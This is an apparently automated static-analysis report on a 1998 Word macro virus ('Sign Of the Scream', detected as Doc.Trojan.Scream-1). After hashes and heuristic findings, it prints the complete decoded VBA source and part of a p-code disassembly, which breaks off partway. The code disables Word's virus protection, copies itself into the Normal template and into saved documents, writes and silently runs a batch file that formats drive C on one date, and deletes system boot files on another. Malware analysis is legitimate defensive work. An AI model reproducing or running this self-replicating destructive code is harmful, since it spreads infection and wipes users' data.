Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 373bc278d05f80f5…

MALICIOUS

Office (OLE)

136.0 KB Created: 1998-10-18 10:33:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7efee59a7649f73378136fbc71e488d6 SHA-1: ae4415f403b80b2b51b2f560a2df5a90d78e2d96 SHA-256: 373bc278d05f80f5e663f384b40fbd7919fed36b239a661a5a205885b0b806f9
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains a VBA macro with a Document_Open auto-execution trigger that utilizes the Shell() function. This macro attempts to create and execute a batch file 'C:\SOS.BAT' which contains destructive commands like 'format c: /u'. The macro also references an INI file 'C:\Dos\Sos.ini' for configuration, suggesting a more complex payload or persistence mechanism. The presence of legacy WordBasic markers and the specific macro names indicate a classic macro-based malware.

Heuristics 6

  • ClamAV: Doc.Trojan.Scream-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Scream-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
            Shell "C:\SOS.BAT", vbHide
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26308 bytes
SHA-256: 2ace349b5ccb006b5b61f7729534d44b4ee3ab8e902d056eac4cc75acf7a6873
Detection
ClamAV: Doc.Trojan.Scream-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SignOS"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoExec()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorAEx
Dim MyDate, MyTime
T$ = Mid(MyTime, 1, 2)
MyDate = Date
D$ = Mid(MyDate, 1, 2)
D1$ = Mid(MyDate, 1, 5)
Select Case D$
Case 1, 3, 5, 7, 9, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31
Sos1:
    Pay1.Show
    If System.PrivateProfileString("C:\Dos\Sos.ini", "Pay1", "OK") = "0" Then GoTo Sos1
    If D1$ = "01/08" Then
        MsgBox "Vive le groupe SOS et son créateur Nightmare Joker!!!!", vbInformation, "Virus SOS(Sign Of the Scream)"
        Open "C:\SOS.BAT" For Output As #1
            Print #1, "echo y|format c: /u"
            Print #1, "echo o|format c: /u"
        Close #1
        Shell "C:\SOS.BAT", vbHide
        WordBasic.Exit
    End If
Case 2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30
Sos2:
    Pay2.Show
    If System.PrivateProfileString("C:\Dos\Sos.ini", "Pay2", "OK") = "0" Then GoTo Sos2
    If D1$ = "24/12" Then
        MsgBox "Joyeux noel de la part de ZeMacroKiller98!!!", vbInformation, "Virus SOS"
        Kill "C:\config.sys"
        Kill "C:\Autoexec.bat"
        Kill "C:\msdos.sys"
        Kill "C:\io.sys"
    End If
End Select
ErrorAEx:
End Sub
Private Sub Document_Close()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorDC
Selection.EndKey Unit:=wdStory
Selection.TypeParagraph
Selection.TypeText Text:="SOS-> The Sign Of the Scream"
ActiveDocument.Save
ErrorDC:
End Sub

Private Sub Document_New()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorDN
ActiveDocument.Shapes.AddTextEffect(msoTextEffect22, "Sign Of the Scream", "Impact", 70#, msoFalse, msoFalse, 83.5, 91#).Select
ErrorDN:
End Sub
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorDO
iMacroNormalCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroNormalCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "SignOS" Then
        SosNTInstalled = -1
    End If
Next i
If Not SosNTInstalled Then
    ActiveDocument.VBProject.VBComponents("SignOS").Export "C:\Sos.sys"
    ActiveDocument.VBProject.VBComponents("HA").Export "C:\HA.sys"
    ActiveDocument.VBProject.VBComponents("Pay1").Export "C:\Pay1.sys"
    ActiveDocument.VBProject.VBComponents("Pay2").Export "C:\Pay2.sys"
    ActiveDocument.VBProject.VBComponents("MVB").Export "C:\MVB.sys"
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Sos.sys"
    NormalTemplate.VBProject.VBComponents("SignOS").CodeModule.DeleteLines 1, 4
    NormalTemplate.VBProject.VBComponents.Import "C:\HA.sys"
    NormalTemplate.VBProject.VBComponents.Import "C:\Pay1.sys"
    NormalTemplate.VBProject.VBComponents.Import "C:\Pay2.sys"
    NormalTemplate.VBProject.VBComponents.Import "C:\MVB.sys"
    CommandBars("help").Controls(5).Caption = "A propos du Virus SOS"
End If
ErrorDO:
End Sub
Sub FileSaveAs()
Attribute FileSaveAs.VB_ProcData.VB_Invoke_Func = "Virus.Sos.FileSaveAs"
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFSA
Dialogs(wdDialogFileSaveAs).Show
If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
    ActiveDocument.SaveAs FileFormat:=wdFormatTemplate
End If
iMacroDocumentCount = ActiveDocument.VBProject.VBComponents.Count
For i = 1 To iMacroDocumentCount
    If ActiveDocument.VBProject.VBComponents(i).Name = "SignOS" Then
        SosDocInstalled = -1
    End If
Next i
If Not SosDocInstalled Then
    NormalTemplate.VBProject.VBComponents("SignOS").Export "C:\Sos.sys"
    NormalTemplate.VBProject.VBComponents("HA").Export "C:\HA.sys"
    NormalTemplate.VBProject.VBComponents("Pay1").Export "C:\Pay1.sys"
    NormalTemplate.VBProject.VBComponents("Pay2").Export "C:\Pay2.sys"
    NormalTemplate.VBProject.VBComponents("MVB").Export "C:\MVB.sys"
    ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Sos.sys"
    ActiveDocument.VBProject.VBComponents("SignOS").CodeModule.DeleteLines 1, 4
    ActiveDocument.VBProject.VBComponents.Import "C:\HA.sys"
    ActiveDocument.VBProject.VBComponents.Import "C:\Pay1.sys"
    ActiveDocument.VBProject.VBComponents.Import "C:\Pay2.sys"
    ActiveDocument.VBProject.VBComponents.Import "C:\MVB.sys"
End If
ErrorFSA:
End Sub
Sub FileTemplates()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorFTe
ErrorFTe:
End Sub
Sub HelpAbout()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorHA
HA.Show
ErrorHA:
End Sub
Sub ToolsMacro()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorTMa
MsgBox "Attention, votre ordinateur contient le SOS..." & Chr$(13) & "Your computer contain the SOS...", vbCritical, "Virus SOS (Sign Of the Scream)"
ErrorTMa:
End Sub
Sub ViewVBCode()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
On Error GoTo ErrorVVBC
MVB.Show
ErrorVVBC:
End Sub

Attribute VB_Name = "HA"
Attribute VB_Base = "0{AAC47472-6811-11D2-811E-444553540001}{AAC47460-6811-11D2-811E-444553540001}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub userform_initialize()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End Sub
Private Sub CommandButton1_Click()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Unload HA
End Sub

Attribute VB_Name = "Pay1"
Attribute VB_Base = "0{AAC47476-6811-11D2-811E-444553540001}{AAC47468-6811-11D2-811E-444553540001}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub userform_initialize()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
System.PrivateProfileString("C:\Dos\Sos.ini", "Pay1", "OK") = "0"
End Sub
Private Sub CommandButton1_Click()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
System.PrivateProfileString("C:\DOS\Sos.ini", "Pay1", "OK") = "1"
Unload Pay1
End Sub

Attribute VB_Name = "Pay2"
Attribute VB_Base = "0{AAC4747A-6811-11D2-811E-444553540001}{AAC4746A-6811-11D2-811E-444553540001}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub userform_initialize()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
System.PrivateProfileString("C:\Dos\Sos.ini", "Pay2", "OK") = "0"
End Sub
Private Sub CommandButton1_Click()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
System.PrivateProfileString("C:\Dos\Sos.ini", "Pay2", "OK") = "1"
Unload Pay2
End Sub

Attribute VB_Name = "MVB"
Attribute VB_Base = "0{AAC474B3-6811-11D2-811E-444553540001}{AAC4746C-6811-11D2-811E-444553540001}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Processing file: /tmp/qstore_vfkkhf4o
' ===============================================================================
' Module streams:
' Macros/VBA/SignOS - 30776 bytes
' Line #0:
' 	FuncDefn (Sub AutoExec())
' Line #1:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #2:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #3:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	OnError ErrorAEx 
' Line #6:
' 	Dim 
' 	VarDefn MyDate
' 	VarDefn MyTime
' Line #7:
' 	Ld MyTime 
' 	LitDI2 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	St T$ 
' Line #8:
' 	Ld Date 
' 	St MyDate 
' Line #9:
' 	Ld MyDate 
' 	LitDI2 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	St D$ 
' Line #10:
' 	Ld MyDate 
' 	LitDI2 0x0001 
' 	LitDI2 0x0005 
' 	ArgsLd Mid$ 0x0003 
' 	St D1$ 
' Line #11:
' 	Ld D$ 
' 	SelectCase 
' Line #12:
' 	LitDI2 0x0001 
' 	Case 
' 	LitDI2 0x0003 
' 	Case 
' 	LitDI2 0x0005 
' 	Case 
' 	LitDI2 0x0007 
' 	Case 
' 	LitDI2 0x0009 
' 	Case 
' 	LitDI2 0x000D 
' 	Case 
' 	LitDI2 0x000F 
' 	Case 
' 	LitDI2 0x0011 
' 	Case 
' 	LitDI2 0x0013 
' 	Case 
' 	LitDI2 0x0015 
' 	Case 
' 	LitDI2 0x0017 
' 	Case 
' 	LitDI2 0x0019 
' 	Case 
' 	LitDI2 0x001B 
' 	Case 
' 	LitDI2 0x001D 
' 	Case 
' 	LitDI2 0x001F 
' 	Case 
' 	CaseDone 
' Line #13:
' 	Label Sos1 
' Line #14:
' 	Ld Pay1 
' 	ArgsMemCall Show 0x0000 
' Line #15:
' 	LitStr 0x000E "C:\Dos\Sos.ini"
' 	LitStr 0x0004 "Pay1"
' 	LitStr 0x0002 "OK"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0001 "0"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Sos1 
' 	EndIf 
' Line #16:
' 	Ld D1$ 
' 	LitStr 0x0005 "01/08"
' 	Eq 
' 	IfBlock 
' Line #17:
' 	LitStr 0x0036 "Vive le groupe SOS et son créateur Nightmare Joker!!!!"
' 	Ld vbInformation 
' 	LitStr 0x001D "Virus SOS(Sign Of the Scream)"
' 	ArgsCall MsgBox 0x0003 
' Line #18:
' 	LitStr 0x000A "C:\SOS.BAT"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #19:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0013 "echo y|format c: /u"
' 	PrintItemNL 
' Line #20:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0013 "echo o|format c: /u"
' 	PrintItemNL 
' Line #21:
' 	LitDI2 0x0001 
' 	Sharp 
' 	Close 0x0001 
' Line #22:
' 	LitStr 0x000A "C:\SOS.BAT"
' 	Ld vbHide 
' 	ArgsCall Shell 0x0002 
' Line #23:
' 	Ld WordBasic 
' 	ArgsMemCall Explicit 0x0000 
' Line #24:
' 	EndIfBlock 
' Line #25:
' 	LitDI2 0x0002 
' 	Case 
' 	LitDI2 0x0004 
' 	Case 
' 	LitDI2 0x0006 
' 	Case 
' 	LitDI2 0x0008 
' 	Case 
' 	LitDI2 0x000A 
' 	Case 
' 	LitDI2 0x000C 
' 	Case 
' 	LitDI2 0x000E 
' 	Case 
' 	LitDI2 0x0010 
' 	Case 
' 	LitDI2 0x0012 
' 	Case 
' 	LitDI2 0x0014 
' 	Case 
' 	LitDI2 0x0016 
' 	Case 
' 	LitDI2 0x0018 
' 	Case 
' 	LitDI2 0x001A 
' 	Case 
' 	LitDI2 0x001C 
' 	Case 
' 	LitDI2 0x001E 
' 	Case 
' 	CaseDone 
' Line #26:
' 	Label Sos2 
' Line #27:
' 	Ld Pay2 
' 	ArgsMemCall Show 0x0000 
' Line #28:
' 	LitStr 0x000E "C:\Dos\Sos.ini"
' 	LitStr 0x0004 "Pay2"
' 	LitStr 0x0002 "OK"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x0001 "0"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Sos2 
' 	EndIf 
' Line #29:
' 	Ld D1$ 
' 	LitStr 0x0005 "24/12"
' 	Eq 
' 	IfBlock 
' Line #30:
' 	LitStr 0x002C "Joyeux noel de la part de ZeMacroKiller98!!!"
' 	Ld vbInformation 
' 	LitStr 0x0009 "Virus SOS"
' 	ArgsCall MsgBox 0x0003 
' Line #31:
' 	LitStr 0x000D "C:\config.sys"
' 	ArgsCall Kill 0x0001 
' Line #32:
' 	LitStr 0x000F "C:\Autoexec.bat"
' 	ArgsCall Kill 0x0001 
' Line #33:
' 	LitStr 0x000C "C:\msdos.sys"
' 	ArgsCall Kill 0x0001 
' Line #34:
' 	LitStr 0x0009 "C:\io.sys"
' 	ArgsCall Kill 0x0001 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	EndSelect 
' Line #37:
' 	Label ErrorAEx 
' Line #38:
' 	EndSub 
' Line #39:
' 	FuncDefn (Private Sub Document_Close())
' Line #40:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #41:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #42:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #43:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #44:
' 	OnError ErrorDC 
' Line #45:
' 	Ld wdStory 
' 	ParamNamed Unit 
' 	Ld Selection 
' 	ArgsMemCall EndKey 0x0001 
' Line #46:
' 	Ld Selection 
' 	ArgsMemCall TypeParagraph 0x0000 
' Line #47:
' 	LitStr 0x001C "SOS-> The Sign Of the Scream"
' 	ParamNamed Then 
' 	Ld Selection 
' 	ArgsMemCall TypeText 0x0001 
' Line #48:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #49:
' 	Label ErrorDC 
' Line #50:
' 	EndSub 
' Line #51:
' Line #52:
' 	FuncDefn (Private Sub Document_New())
' Line #53:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #54:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #55:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #56:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #57:
' 	OnError ErrorDN 
' Line #58:
' 	Ld msoTextEffect22 
' 	LitStr 0x0012 "Sign Of the Scream"
' 	LitStr 0x0006 "Impact"
' 	LitR8 0x0000 0x0000 0x8000 0x4051 
' 	Ld msoFalse 
' 	Ld msoFalse 
' 	LitR8 0x0000 0x0000 0xE000 0x4054 
' 	LitR8 0x0000 0x0000 0xC000 0x4056 
' 	Ld ActiveDocument 
' 	MemLd Shapes 
' 	ArgsMemLd AddTextEffect 0x0008 
' 	ArgsMemCall Set 0x0000 
' Line #59:
' 	Label ErrorDN 
' Line #60:
' 	EndSub 
' Line #61:
' 	FuncDefn (Private Sub Document_Open())
' Line #62:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #63:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #64:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #65:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #66:
' 	OnError ErrorDO 
' Line #67:
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	St iMacroNormalCount 
' Line #68:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld iMacroNormalCount 
' 	For 
' Line #69:
' 	Ld i 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "SignOS"
' 	Eq 
' 	IfBlock 
' Line #70:
' 	LitDI2 0x0001 
' 	UMi 
' 	St SosNTInstalled 
' Line #71:
' 	EndIfBlock 
' Line #72:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #73:
' 	Ld SosNTInstalled 
' 	Not 
' 	IfBlock 
' Line #74:
' 	LitStr 0x000A "C:\Sos.sys"
' 	LitStr 0x0006 "SignOS"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #75:
' 	LitStr 0x0009 "C:\HA.sys"
' 	LitStr 0x0002 "HA"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #76:
' 	LitStr 0x000B "C:\Pay1.sys"
' 	LitStr 0x0004 "Pay1"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #77:
' 	LitStr 0x000B "C:\Pay2.sys"
' 	LitStr 0x0004 "Pay2"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #78:
' 	LitStr 0x000A "C:\MVB.sys"
' 	LitStr 0x0003 "MVB"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #79:
' 	LitStr 0x000A "C:\Sos.sys"
' 	LitStr 0x000C "ThisDocument"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromFile 0x0001 
' Line #80:
' 	LitDI2 0x0001 
' 	LitDI2 0x0004 
' 	LitStr 0x0006 "SignOS"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #81:
' 	LitStr 0x0009 "C:\HA.sys"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #82:
' 	LitStr 0x000B "C:\Pay1.sys"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #83:
' 	LitStr 0x000B "C:\Pay2.sys"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #84:
' 	LitStr 0x000A "C:\MVB.sys"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #85:
' 	LitStr 0x0015 "A propos du Virus SOS"
' 	LitDI2 0x0005 
' 	LitStr 0x0004 "help"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Caption 
' Line #86:
' 	EndIfBlock 
' Line #87:
' 	Label ErrorDO 
' Line #88:
' 	EndSub 
' Line #89:
' 	FuncDefn (Sub FileSaveAs())
' Line #90:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #91:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #92:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #93:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #94:
' 	OnError ErrorFSA 
' Line #95:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #96:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #97:
' 	Ld wdFormatTemplate 
' 	ParamNamed FileFormat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0001 
' Line #98:
' 	EndIfBlock 
' Line #99:
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	St iMacroDocumentCount 
' Line #100:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld iMacroDocumentCount 
' 	For 
' Line #101:
' 	Ld i 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0006 "SignOS"
' 	Eq 
' 	IfBlock 
' Line #102:
' 	LitDI2 0x0001 
' 	UMi 
' 	St SosDocInstalled 
' Line #103:
' 	EndIfBlock 
' Line #104:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #105:
' 	Ld SosDocInstalled 
' 	Not 
' 	IfBlock 
' Line #106:
' 	LitStr 0x000A "C:\Sos.sys"
' 	LitStr 0x0006 "SignOS"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #107:
' 	LitStr 0x0009 "C:\HA.sys"
' 	LitStr 0x0002 "HA"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #108:
' 	LitStr 0x000B "C:\Pay1.sys"
' 	LitStr 0x0004 "Pay1"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #109:
' 	LitStr 0x000B "C:\Pay2.sys"
' 	LitStr 0x0004 "Pay2"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #110:
' 	LitStr 0x000A "C:\MVB.sys"
' 	LitStr 0x0003 "MVB"
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #111:
' 	LitStr 0x000A "C:\Sos.sys"
' 	LitStr 0x000C "ThisDocument"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromFile 0x0001 
' Line #112:
' 	LitDI2 0x0001 
' 	LitDI2 0x0004 
' 	LitStr 0x0006 "SignOS"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #113:
' 	LitStr 0x0009 "C:\HA.sys"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #114:
' 	LitStr 0x000B "C:\Pay1.sys"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #115:
' 	LitStr 0x000B "C:\Pay2.sys"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #116:
' 	LitStr 0x000A "C:\MVB.sys"
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #117:
' 	EndIfBlock 
' Line #118:
' 	Label ErrorFSA 
' Line #119:
' 	EndSub 
' Line #120:
' 	FuncDefn (Sub FileTemplates())
' Line #121:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #122:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #123:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #124:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #125:
' 	OnError ErrorFTe 
' Line #126:
' 	Label ErrorFTe 
' Line #127:
' 	EndSub 
' Line #128:
' 	FuncDefn (Sub HelpAbout())
' Line #129:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #130:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #131:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #132:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #133:
' 	OnError ErrorHA 
' Line #134:
' 	Ld HA 
' 	ArgsMemCall Show 0x0000 
' Line #135:
' 	Label ErrorHA 
' Line #136:
' 	EndSub 
' Line #137:
' 	FuncDefn (Sub ToolsMacro())
' Line #138:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #139:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #140:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #141:
' 	LitVarSpecial (False)
' 	Ld Options 
